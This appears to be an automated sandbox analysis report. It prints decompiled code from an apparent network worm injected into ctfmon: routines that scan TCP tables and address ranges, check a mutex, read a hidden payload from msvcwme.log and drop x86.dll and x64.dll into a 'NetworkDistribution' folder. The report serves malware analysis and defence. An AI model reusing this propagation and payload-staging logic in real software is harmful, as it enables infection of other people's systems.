                                                0x009653ad
                                                0x00000000
                                                0x009653ad
                                                0x00965362
                                                0x00965377
                                                0x0096537a
                                                0x00000000
                                                0x00000000
                                                0x00965380
                                                0x00965383
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00965383
                                                0x00965367
                                                0x00000000
                                                0x00000000
                                                0x00965370
                                                0x00000000
                                                0x00000000
                                                0x00965741
                                                0x00965747
                                                0x0096574d
                                                0x00965754
                                                0x00965757
                                                0x0096575d
                                                0x00965763
                                                0x0096576b
                                                0x00965771
                                                0x00000000
                                                0x00965771
                                                0x009652b5
                                                0x009652c8
                                                0x009652ca
                                                0x009652d2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00965777
                                                0x0096577d
                                                0x00965784
                                                0x0096578e
                                                0x0096579b
                                                0x009657a1
                                                0x009657a3
                                                0x009657a9
                                                0x00000000

                                                APIs
                                                • Sleep.KERNELBASE(00001388,35554C2F), ref: 00965241
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 00965271
                                                • HeapAlloc.KERNEL32(00000000), ref: 00965274
                                                • GetTcpTable.IPHLPAPI(00000000,00000000,00000001), ref: 009652A4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009652B2
                                                • HeapFree.KERNEL32(00000000), ref: 009652B5
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 009652BF
                                                • HeapAlloc.KERNEL32(00000000), ref: 009652C2
                                                • GetTcpTable.IPHLPAPI(00000000,00000018,00000001), ref: 009652E2
                                                • GetTickCount.KERNEL32 ref: 009655F1
                                                • GetTickCount.KERNEL32 ref: 009656F1
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0096577A
                                                • HeapFree.KERNEL32(00000000), ref: 0096577D
                                                • Sleep.KERNEL32(00001388), ref: 00965784
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 00965798
                                                • HeapAlloc.KERNEL32(00000000), ref: 0096579B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009657B6
                                                • HeapFree.KERNEL32(00000000), ref: 009657B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree$CountSleepTableTick
                                                • String ID: %d.%d.%d.*$/LU5/
                                                • API String ID: 4207308331-1555885800
                                                • Opcode ID: e9186607ce05e9c151e07e8aabcfc7668df535e9be4125fe0d3552a338905a11
                                                • Instruction ID: 6e1cf2a7a9d1877765c8046328b879c260c98f1d2b6018cbe88b334f139b6ed2
                                                • Opcode Fuzzy Hash: e9186607ce05e9c151e07e8aabcfc7668df535e9be4125fe0d3552a338905a11
                                                • Instruction Fuzzy Hash: 47F17A70900729DFEB20DF64CC84BAAB7B9AB05304F5545E9E44EA7292DB749E88CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0096FC10(signed int* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
                                                				signed int _v8;
                                                				char _v267;
                                                				char _v268;
                                                				char _v528;
                                                				struct _FILETIME _v544;
                                                				struct _FILETIME _v552;
                                                				struct _FILETIME _v560;
                                                				long _v564;
                                                				char _v828;
                                                				char _v829;
                                                				struct _OVERLAPPED* _v836;
                                                				long _v840;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t74;
                                                				signed int _t76;
                                                				signed int _t77;
                                                				signed int _t80;
                                                				char _t81;
                                                				void* _t83;
                                                				signed int _t91;
                                                				void* _t97;
                                                				long _t100;
                                                				signed int _t110;
                                                				void* _t111;
                                                				signed int _t120;
                                                				signed int _t125;
                                                				signed int _t127;
                                                				signed int* _t133;
                                                				signed int _t134;
                                                				void* _t136;
                                                				intOrPtr _t142;
                                                				signed int* _t144;
                                                				signed int* _t145;
                                                				signed int _t148;
                                                				signed int* _t156;
                                                				signed int* _t167;
                                                				signed int* _t174;
                                                				signed int _t175;
                                                				void* _t181;
                                                				signed int _t183;
                                                				signed int* _t184;
                                                				long _t186;
                                                				void* _t187;
                                                				void* _t188;
                                                				void* _t189;
                                                				signed int _t190;
                                                				signed int _t192;
                                                				signed int _t197;
                                                				void* _t198;
                                                				void* _t200;
                                                
                                                				_t166 = __edx;
                                                				_t192 = _t197;
                                                				_t198 = _t197 - 0x344;
                                                				_t74 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t74 ^ _t192;
                                                				_t133 = _a8;
                                                				_t174 = __ecx;
                                                				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                					E0096F2D0( *((intOrPtr*)(__ecx)), __edx);
                                                				}
                                                				_t76 =  *_t174;
                                                				_t142 = _a4;
                                                				_t174[1] = 0xffffffff;
                                                				if(_t142 <  *((intOrPtr*)(_t76 + 4))) {
                                                					__eflags = _t142 -  *((intOrPtr*)(_t76 + 0x10));
                                                					if(_t142 <  *((intOrPtr*)(_t76 + 0x10))) {
                                                						E0096EC60(_t76);
                                                						_t142 = _a4;
                                                					}
                                                					_t77 =  *_t174;
                                                					_push(_t181);
                                                					__eflags =  *((intOrPtr*)(_t77 + 0x10)) - _t142;
                                                					if( *((intOrPtr*)(_t77 + 0x10)) < _t142) {
                                                						do {
                                                							_t190 =  *_t174;
                                                							__eflags = _t190;
                                                							if(_t190 != 0) {
                                                								__eflags =  *(_t190 + 0x18);
                                                								if( *(_t190 + 0x18) != 0) {
                                                									_t166 =  *((intOrPtr*)(_t190 + 0x10)) + 1;
                                                									__eflags = _t166 -  *((intOrPtr*)(_t190 + 4));
                                                									if(_t166 !=  *((intOrPtr*)(_t190 + 4))) {
                                                										 *((intOrPtr*)(_t190 + 0x10)) = _t166;
                                                										 *((intOrPtr*)(_t190 + 0x14)) =  *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x48)) + 0x2e +  *((intOrPtr*)(_t190 + 0x50)) +  *((intOrPtr*)(_t190 + 0x4c));
                                                										_t20 = _t190 + 0x28; // 0x28
                                                										_t166 = _t20;
                                                										_t21 = _t190 + 0x78; // 0x78
                                                										_t125 = E0096E7C0(_t190, _t20, _t21, 0, 0);
                                                										_t142 = _a4;
                                                										_t198 = _t198 - 0x10 + 0x1c;
                                                										asm("sbb eax, eax");
                                                										_t127 =  ~_t125 + 1;
                                                										__eflags = _t127;
                                                										 *(_t190 + 0x18) = _t127;
                                                									}
                                                								}
                                                							}
                                                							_t120 =  *_t174;
                                                							__eflags =  *((intOrPtr*)(_t120 + 0x10)) - _t142;
                                                						} while ( *((intOrPtr*)(_t120 + 0x10)) < _t142);
                                                					}
                                                					E0096F4E0(_t133, _t174, _t166, _t174, _t142,  &_v828);
                                                					__eflags = _v564 & 0x00000010;
                                                					_t80 =  *_t133;
                                                					if((_v564 & 0x00000010) == 0) {
                                                						_t167 = _t133;
                                                						_t144 = _t133;
                                                						__eflags = _t80;
                                                						while(_t80 != 0) {
                                                							__eflags = _t80 - 0x2f;
                                                							if(_t80 == 0x2f) {
                                                								L23:
                                                								_t32 =  &(_t144[0]); // 0x965105
                                                								_t167 = _t32;
                                                							} else {
                                                								__eflags = _t80 - 0x5c;
                                                								if(_t80 == 0x5c) {
                                                									goto L23;
                                                								}
                                                							}
                                                							_t33 =  &(_t144[0]); // 0x996a4c
                                                							_t80 =  *_t33;
                                                							_t144 =  &(_t144[0]);
                                                							__eflags = _t80;
                                                						}
                                                						_t145 = _t133;
                                                						_t183 =  &_v268 - _t133;
                                                						__eflags = _t183;
                                                						do {
                                                							_t81 =  *_t145;
                                                							_t35 =  &(_t145[0]); // 0x996a4c
                                                							_t145 = _t35;
                                                							 *((char*)(_t183 + _t145 - 1)) = _t81;
                                                							__eflags = _t81;
                                                						} while (_t81 != 0);
                                                						__eflags = _t167 - _t133;
                                                						if(_t167 != _t133) {
                                                							_t83 = _t167 - _t133;
                                                							__eflags = _t83 - 0x104;
                                                							if(_t83 >= 0x104) {
                                                								E00970E90();
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								_push(_t183);
                                                								_t184 = _t145;
                                                								_push(_t174);
                                                								__eflags = _t184[1] - 0xffffffff;
                                                								if(_t184[1] != 0xffffffff) {
                                                									E0096F2D0( *_t184, _t167);
                                                								}
                                                								_t175 =  *_t184;
                                                								_t184[1] = 0xffffffff;
                                                								__eflags = _t175;
                                                								if(_t175 != 0) {
                                                									__eflags =  *(_t175 + 0x7c);
                                                									if( *(_t175 + 0x7c) != 0) {
                                                										E0096F2D0(_t175, _t167);
                                                									}
                                                									_push(_t133);
                                                									_t134 =  *_t175;
                                                									__eflags = _t134;
                                                									if(_t134 != 0) {
                                                										__eflags =  *((char*)(_t134 + 0x10));
                                                										if( *((char*)(_t134 + 0x10)) != 0) {
                                                											CloseHandle( *(_t134 + 4));
                                                										}
                                                										_push(0x20);
                                                										E00970AA1(_t134);
                                                										_t198 = _t198 + 8;
                                                									}
                                                									L00975A36(_t175);
                                                								}
                                                								__eflags = 0;
                                                								 *_t184 = 0;
                                                								return 0;
                                                							} else {
                                                								 *((char*)(_t192 + _t83 - 0x108)) = 0;
                                                								_t91 = _v268;
                                                								__eflags = _t91 - 0x2f;
                                                								if(_t91 == 0x2f) {
                                                									L35:
                                                									wsprintfA( &_v528, "%s%s",  &_v268, _t167);
                                                									_t200 = _t198 + 0x10;
                                                									_t148 = 0;
                                                									__eflags = 0;
                                                								} else {
                                                									__eflags = _t91 - 0x5c;
                                                									if(_t91 == 0x5c) {
                                                										goto L35;
                                                									} else {
                                                										__eflags = _t91;
                                                										if(_t91 == 0) {
                                                											goto L34;
                                                										} else {
                                                											__eflags = _v267 - 0x3a;
                                                											if(_v267 == 0x3a) {
                                                												goto L35;
                                                											} else {
                                                												goto L34;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L36;
                                                							}
                                                						} else {
                                                							_v268 = _t81;
                                                							L34:
                                                							_t183 =  &(_t174[0x50]);
                                                							wsprintfA( &_v528, "%s%s%s", _t183,  &_v268, _t167);
                                                							_t200 = _t198 + 0x14;
                                                							_t148 = _t183;
                                                							L36:
                                                							E0096FB00(_t148,  &_v268); // executed
                                                							_t97 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0); // executed
                                                							_t136 = _t97;
                                                							__eflags = _t136 - 0xffffffff;
                                                							if(_t136 != 0xffffffff) {
                                                								E0096EF10( *_t174, _t174[0x4e]); // executed
                                                								__eflags = _t174[0x4f];
                                                								if(__eflags == 0) {
                                                									_push(0x4000); // executed
                                                									_t111 = E00970AB4(_t183, __eflags); // executed
                                                									_t200 = _t200 + 4;
                                                									_t174[0x4f] = _t111;
                                                								}
                                                								_v836 = 0;
                                                								while(1) {
                                                									_t170 = _t174[0x4f];
                                                									_t100 = E0096F090( *_t174, _t174[0x4f], 0x4000,  &_v829); // executed
                                                									_t186 = _t100;
                                                									_t200 = _t200 + 8;
                                                									__eflags = _t186 - 0xffffff96;
                                                									if(_t186 == 0xffffff96) {
                                                										break;
                                                									}
                                                									__eflags = _t186;
                                                									if(__eflags < 0) {
                                                										L47:
                                                										_v836 = 0x5000000;
                                                									} else {
                                                										if(__eflags <= 0) {
                                                											L45:
                                                											__eflags = _v829;
                                                											if(_v829 != 0) {
                                                												SetFileTime(_t136,  &_v552,  &_v560,  &_v544); // executed
                                                											} else {
                                                												__eflags = _t186;
                                                												if(_t186 != 0) {
                                                													continue;
                                                												} else {
                                                													goto L47;
                                                												}
                                                											}
                                                										} else {
                                                											_t110 = WriteFile(_t136, _t174[0x4f], _t186,  &_v840, 0); // executed
                                                											__eflags = _t110;
                                                											if(_t110 == 0) {
                                                												_v836 = 0x400;
                                                											} else {
                                                												goto L45;
                                                											}
                                                										}
                                                									}
                                                									L51:
                                                									FindCloseChangeNotification(_t136); // executed
                                                									E0096F2D0( *_t174, _t170);
                                                									__eflags = _v8 ^ _t192;
                                                									_pop(_t187);
                                                									return E00970A5D(_v8 ^ _t192, _t187);
                                                									goto L64;
                                                								}
                                                								_v836 = 0x1000;
                                                								goto L51;
                                                							} else {
                                                								_pop(_t188);
                                                								__eflags = _v8 ^ _t192;
                                                								return E00970A5D(_v8 ^ _t192, _t188);
                                                							}
                                                						}
                                                					} else {
                                                						__eflags = _t80 - 0x2f;
                                                						if(_t80 == 0x2f) {
                                                							L18:
                                                							_t156 = 0;
                                                							__eflags = 0;
                                                						} else {
                                                							__eflags = _t80 - 0x5c;
                                                							if(_t80 == 0x5c) {
                                                								goto L18;
                                                							} else {
                                                								__eflags = _t80;
                                                								if(_t80 == 0) {
                                                									L17:
                                                									_t156 =  &(_t174[0x50]);
                                                								} else {
                                                									__eflags = _t133[0] - 0x3a;
                                                									if(_t133[0] == 0x3a) {
                                                										goto L18;
                                                									} else {
                                                										goto L17;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						E0096FB00(_t156, _t133);
                                                						_pop(_t189);
                                                						__eflags = _v8 ^ _t192;
                                                						return E00970A5D(_v8 ^ _t192, _t189);
                                                					}
                                                				} else {
                                                					return E00970A5D(_v8 ^ _t192, _t181);
                                                				}
                                                				L64:
                                                			}

                                                APIs
                                                • wsprintfA.USER32 ref: 0096FDA6
                                                • wsprintfA.USER32 ref: 0096FDC7
                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0096FDF7
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0096FE8A
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 0096FECF
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0096FEE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$ChangeCloseCreateFindNotificationTimeWrite
                                                • String ID: %s%s$%s%s%s$/LU5/$:
                                                • API String ID: 2340708895-161730245
                                                • Opcode ID: 59842aebca33c19254238887712430c72566f31291e265eef06171f0db35c34d
                                                • Instruction ID: ece078519d8305a2a247ddefc80bfffa0b35d8409bc82b354fb145fb845a4d62
                                                • Opcode Fuzzy Hash: 59842aebca33c19254238887712430c72566f31291e265eef06171f0db35c34d
                                                • Instruction Fuzzy Hash: A19150716002089FCB35DF24ECA4BE9B7B9BF45300F1045BAE99A972C1D775AE85CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E00966FE0(void* __ebx, CHAR* __ecx, void* __edi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				void* __esi;
                                                				signed int _t17;
                                                				void* _t23;
                                                				void* _t29;
                                                				void* _t30;
                                                				void* _t42;
                                                				CHAR* _t59;
                                                				signed int _t60;
                                                
                                                				_t58 = __edi;
                                                				_t17 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t17 ^ _t60;
                                                				_t59 = __ecx;
                                                				E00973440(__edi,  &_v268, 0, 0x104);
                                                				_push("Diagnostics.txt");
                                                				E00965180( &_v268, 0x104, "%s\%s", _t59);
                                                				_t23 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0); // executed
                                                				_t66 = _t23 - 0xffffffff;
                                                				if(_t23 == 0xffffffff) {
                                                					L5:
                                                					__eflags = _v8 ^ _t60;
                                                					return E00970A5D(_v8 ^ _t60, _t59);
                                                				} else {
                                                					FindCloseChangeNotification(_t23); // executed
                                                					CreateDirectoryA(_t59, 0); // executed
                                                					_t29 = E00967140(_t66,  &_v268); // executed
                                                					_t67 = _t29;
                                                					if(_t29 == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t30 = E00965010(__ebx, _t59, _t58, _t67); // executed
                                                						_t68 = _t30;
                                                						if(_t30 == 0) {
                                                							goto L5;
                                                						} else {
                                                							DeleteFileA( &_v268);
                                                							E00973440(_t58,  &_v528, 0, 0x104);
                                                							E00973440(_t58,  &_v788, 0, 0x104);
                                                							E00965180( &_v528, 0x104, "%s\\x86.dll", _t59);
                                                							E00965180( &_v788, 0x104, "%s\\x64.dll", _t59);
                                                							_t42 = E00967140(_t68,  &_v528);
                                                							_t69 = _t42;
                                                							if(_t42 == 0) {
                                                								goto L5;
                                                							} else {
                                                								E00967140(_t69,  &_v788);
                                                								return E00970A5D(_v8 ^ _t60, _t59);
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}















                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096703C
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0096704C
                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00967055
                                                • DeleteFileA.KERNEL32(?), ref: 00967093
                                                  • Part of subcall function 00967140: CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0096718D
                                                  • Part of subcall function 00967140: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 009671A5
                                                  • Part of subcall function 00967140: CloseHandle.KERNEL32(00000000,?,?), ref: 009671B0
                                                  • Part of subcall function 00967140: FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 009671BE
                                                  • Part of subcall function 00967140: LocalFree.KERNELBASE(00000000,?,?), ref: 009671C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseCreate$ChangeFindNotification$DeleteDirectoryFreeHandleLocalWrite
                                                • String ID: %s\%s$%s\x64.dll$%s\x86.dll$/LU5/$C:\Windows\system32\msvcwme.log$Diagnostics.txt
                                                • API String ID: 3326945587-2503390260
                                                • Opcode ID: f4ca093bb7fdd08896f218be3f1f256851672f7ba8f44ce60b344957c1dda961
                                                • Instruction ID: 656479cb4e5c3e35c170b266293c5a27fb61087855f1d7c1057b4753406268cd
                                                • Opcode Fuzzy Hash: f4ca093bb7fdd08896f218be3f1f256851672f7ba8f44ce60b344957c1dda961
                                                • Instruction Fuzzy Hash: 9E31DDB1A4531877DA20F7A0DC4BFDA736C9F46718F1140D1B658B72C1D6B0DB848751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 235 9649e0-964a0e CreateFileA 236 964a10-964a3f GetFileSizeEx LocalAlloc 235->236 237 964a48-964a50 235->237 238 964a51-964a5e 236->238 239 964a41-964a42 CloseHandle 236->239 240 964a60-964a7c ReadFile 238->240 241 964a8c-964a8f 238->241 239->237 242 964a7e-964a87 240->242 243 964a89 240->243 244 964a91-964aaa CloseHandle LocalFree 241->244 245 964aab-964ab9 CloseHandle 241->245 242->240 242->243 243->241
                                                C-Code - Quality: 67%
                                                			E009649E0(void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v12;
                                                				long _v16;
                                                				long _v20;
                                                				struct _OVERLAPPED* _v28;
                                                				long _v32;
                                                				void* _t15;
                                                				void* _t18;
                                                				long _t19;
                                                				long _t27;
                                                				void* _t29;
                                                				void** _t30;
                                                				struct _OVERLAPPED** _t33;
                                                				long _t34;
                                                
                                                				_v12 = __edx;
                                                				_t15 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_t29 = _t15;
                                                				if(_t29 == 0xffffffff) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_v32 = 0;
                                                					_v28 = 0;
                                                					__imp__GetFileSizeEx(_t29,  &_v32);
                                                					_t34 = _v32;
                                                					_v20 = _t34;
                                                					_t18 = LocalAlloc(0x40, _t34); // executed
                                                					_t30 = _v12;
                                                					 *_t30 = _t18;
                                                					if(_t18 != 0) {
                                                						_t33 = _a4;
                                                						_t19 = _t34;
                                                						 *_t33 = 0;
                                                						if(_t19 > 0) {
                                                							while(1) {
                                                								_v16 = 0;
                                                								ReadFile(_t29,  *_t30, _t34,  &_v16, 0); // executed
                                                								_t27 = _v16;
                                                								if(_t27 == 0) {
                                                									break;
                                                								}
                                                								 *_t33 =  *_t33 + _t27;
                                                								_t34 = _t34 - _t27;
                                                								_t30 = _v12;
                                                								if(_t34 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t19 = _v20;
                                                						}
                                                						_push(_t29);
                                                						if( *_t33 == _t19) {
                                                							CloseHandle();
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v12);
                                                							return 0;
                                                						}
                                                					} else {
                                                						CloseHandle(_t29);
                                                						goto L3;
                                                					}
                                                				}
                                                			}
















                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,00964AE6,?), ref: 00964A03
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 00964A23
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 00964A32
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964A42
                                                • ReadFile.KERNELBASE(00000000,73B76490,00000000,?,00000000,?,73B76490), ref: 00964A71
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964A91
                                                • LocalFree.KERNEL32(73B76490,?,73B76490), ref: 00964A9C
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964AAB
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 009649FB
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$Local$AllocCreateFreeReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 47662278-2357825738
                                                • Opcode ID: 3ec6af003fe1f107d19e8a504224155df2857ac54bc5bb89c0eef71ce9e804e4
                                                • Instruction ID: eb7b5cac5eb39a15409ea8808e6010f4e36b5fad7362f1d80a4b44099725e797
                                                • Opcode Fuzzy Hash: 3ec6af003fe1f107d19e8a504224155df2857ac54bc5bb89c0eef71ce9e804e4
                                                • Instruction Fuzzy Hash: 0221F175A44209BBDB108FE5EC89BAEBBBCEF48724F100191F904E7380D7709844CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 38%
                                                			E00969310() {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				char _v48;
                                                				char _v444;
                                                				void* __esi;
                                                				signed int _t12;
                                                				void* _t16;
                                                				signed int _t18;
                                                				void* _t29;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
                                                				_t35 = (_t33 & 0xfffffff8) - 0x1bc;
                                                				_t12 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t12 ^ (_t33 & 0xfffffff8) - 0x000001bc;
                                                				__imp__#115(0x202,  &_v444, _t29); // executed
                                                				asm("movaps xmm0, [0x98cf90]");
                                                				asm("movups [esp+0x1a8], xmm0");
                                                				_v32 = 0x2d383132;
                                                				_v28 = 0x44383732;
                                                				_v24 = 0x7d454536;
                                                				_v20 = 0;
                                                				_t16 = CreateMutexA(0, 1,  &_v48); // executed
                                                				_t30 = _t16;
                                                				_t18 = GetLastError() & 0xffffff00 | _t17 == 0x000000b7;
                                                				if(_t30 == 0) {
                                                					L3:
                                                					_pop(_t31);
                                                					_t10 =  &_v16; // 0x2d383132
                                                					return E00970A5D( *_t10 ^ _t35, _t31);
                                                				} else {
                                                					if(_t18 == 0) {
                                                						_pop(_t32);
                                                						return E00970A5D(_v16 ^ _t35, _t32);
                                                					} else {
                                                						ReleaseMutex(_t30);
                                                						CloseHandle(_t30);
                                                						goto L3;
                                                					}
                                                				}
                                                			}




















                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00969335
                                                • CreateMutexA.KERNELBASE ref: 0096937F
                                                • GetLastError.KERNEL32 ref: 00969387
                                                • ReleaseMutex.KERNEL32(00000000), ref: 0096939E
                                                • CloseHandle.KERNEL32(00000000), ref: 009693A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastReleaseStartup
                                                • String ID: /LU5/$218-$278D$6EE}
                                                • API String ID: 2916891069-3745470937
                                                • Opcode ID: 8fc565f5028599f27111368fe3e27121f257a941ce100faab6b514e4455d8aad
                                                • Instruction ID: 4f02c4bfd4241f2dcca69461635434eae09e04f30cdecccd83706b46057f2b9d
                                                • Opcode Fuzzy Hash: 8fc565f5028599f27111368fe3e27121f257a941ce100faab6b514e4455d8aad
                                                • Instruction Fuzzy Hash: A511A07241C7448BD7309F20E84A7EAB7D8BF86700F40050DE89D8A390DB3154458B83
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 255 966d40-966dbe call 973440 * 2 GetWindowsDirectoryA call 965180 call 966fe0 263 966dc3-966dcf 255->263 264 966dd1-966e06 EnterCriticalSection 263->264 265 966e31-966e3e LeaveCriticalSection 264->265 266 966e08-966e2c call 971920 call 966ef0 264->266 268 966ea0-966ea4 Sleep 265->268 269 966e40-966e42 265->269 266->265 268->264 271 966e45-966e4a 269->271 271->271 273 966e4c-966e51 271->273 274 966e62-966e6f call 970aa1 273->274 275 966e53-966e5f call 975c70 273->275 280 966e87-966e91 call 96b070 274->280 281 966e71-966e81 call 967720 274->281 275->274 280->264 286 966e97-966e9b Sleep 280->286 281->264 281->280 286->264
                                                C-Code - Quality: 84%
                                                			E00966D40() {
                                                				signed int _v8;
                                                				char _v9;
                                                				short _v11;
                                                				char _v15;
                                                				char _v40;
                                                				char _v300;
                                                				char _v560;
                                                				signed int _t18;
                                                				signed char _t29;
                                                				signed int _t30;
                                                				intOrPtr* _t31;
                                                				void* _t35;
                                                				signed char _t47;
                                                				intOrPtr _t51;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				signed int _t60;
                                                				void* _t61;
                                                				void* _t63;
                                                
                                                				_t18 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t18 ^ _t60;
                                                				_push(_t56);
                                                				E00973440(_t56,  &_v300, 0, 0x104);
                                                				E00973440(_t56,  &_v560, 0, 0x104);
                                                				GetWindowsDirectoryA( &_v560, 0x104);
                                                				_push("NetworkDistribution");
                                                				E00965180( &_v300, 0x104, "%s\\%s\\",  &_v560);
                                                				_t63 = _t61 + 0x2c;
                                                				_t29 = E00966FE0(1,  &_v300, _t56); // executed
                                                				_t57 = Sleep;
                                                				asm("sbb bl, bl");
                                                				_t47 =  ~_t29 &  ~_t29;
                                                				while(1) {
                                                					asm("xorps xmm0, xmm0");
                                                					_v40 = 0;
                                                					asm("movups [ebp-0x23], xmm0");
                                                					_t59 = 0;
                                                					_v15 = 0;
                                                					asm("movq [ebp-0x13], xmm0");
                                                					_v11 = 0;
                                                					_v9 = 0;
                                                					EnterCriticalSection(0x996a5c);
                                                					_t30 =  *0x995ba0;
                                                					if(_t30 != 0) {
                                                						_t49 =  *0x995b9c;
                                                						_t38 = _t30 - 1;
                                                						_t59 =  *((intOrPtr*)( *0x995b9c));
                                                						 *0x995ba0 = _t30 - 1;
                                                						E00971920( *0x995b9c, _t49 + 4, _t38 << 2);
                                                						_t63 = _t63 + 0xc;
                                                						E00966EF0(0x995b80);
                                                					}
                                                					L3:
                                                					LeaveCriticalSection(0x996a5c);
                                                					if(_t59 == 0) {
                                                						Sleep(0x64);
                                                						continue;
                                                						do {
                                                							while(1) {
                                                								asm("xorps xmm0, xmm0");
                                                								_v40 = 0;
                                                								asm("movups [ebp-0x23], xmm0");
                                                								_t59 = 0;
                                                								_v15 = 0;
                                                								asm("movq [ebp-0x13], xmm0");
                                                								_v11 = 0;
                                                								_v9 = 0;
                                                								EnterCriticalSection(0x996a5c);
                                                								_t30 =  *0x995ba0;
                                                								if(_t30 != 0) {
                                                									_t49 =  *0x995b9c;
                                                									_t38 = _t30 - 1;
                                                									_t59 =  *((intOrPtr*)( *0x995b9c));
                                                									 *0x995ba0 = _t30 - 1;
                                                									E00971920( *0x995b9c, _t49 + 4, _t38 << 2);
                                                									_t63 = _t63 + 0xc;
                                                									E00966EF0(0x995b80);
                                                								}
                                                								goto L3;
                                                							}
                                                							L9:
                                                							_t35 = E00967720(_t47,  &_v40,  &_v300, _t57, _t59, _t70);
                                                							_t71 = _t35;
                                                						} while (_t35 != 0);
                                                						L10:
                                                						if(E0096B070( &_v40, _t71) == 0) {
                                                							Sleep(0xa);
                                                						}
                                                						continue;
                                                					}
                                                					_t31 = _t59;
